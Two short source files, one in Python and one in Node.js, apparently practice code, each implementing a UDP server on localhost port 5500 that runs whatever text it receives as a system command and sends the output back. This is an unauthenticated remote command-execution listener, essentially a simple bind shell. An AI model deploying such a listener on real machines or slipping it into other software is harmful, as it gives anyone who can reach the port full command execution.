File: python/udp_server_rev.py
#!/usr/bin/env python3

import socket
import subprocess

host = '127.0.0.1'
port = 5500

server_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_socket.bind((host, port))

print("Listening...\n\n")

while True:
    message_bytes, address = server_socket.recvfrom(1024)
    
    # Decode + Remove newlines
    message = message_bytes.decode()
    message = message.replace("\n", "")
    message = message.replace("\r", "")

    print(f"Client: {message}")

    # Handle exit msg
    if message == "exit":
        response = "Exiting!".encode()
        server_socket.sendto(response, address)
        exit(0)

    # Parse args
    cmd = message.replace("-","+-")
    cmd = [item.strip() for item in cmd.split("+")]
    result = subprocess.run(cmd,stdout=subprocess.PIPE)
    # result_decode = result.stdout.decode('utf-8') <- actually no need to decode because would have to re-encode to send back as a reply  
    server_socket.sendto(result.stdout, address)
    

File: node/udp_server_rev.mjs
import { info } from 'console';
import dgram from 'dgram'
import { exit } from 'process';
import { exec } from 'child_process';

const port = 5500;
const host = "127.0.0.1";
const socket = dgram.createSocket("udp4");

// Listen for incoming connnections. (best to always specify an ip otherwise will default to listen on all ips)
socket.bind(port, host, () => { 
    console.log(`Listening...\n`)
});


// Handling Connections
socket.on("message", (cmd, info) => {
    // Can print buffer as-is - but changing to strin to we have access to JS methods (need to remove newlines)
    cmd = cmd.toString('utf8');

    if (cmd == "exit") { 
        console.log("Exiting!");
        exit(0);
    }

    exec(cmd, (err, stdout, stderr) => {
        if (err) {
            // node couldn't execute the command
            return;
        }
        else {
            socket.send(stdout, info.port)
        }
    });


});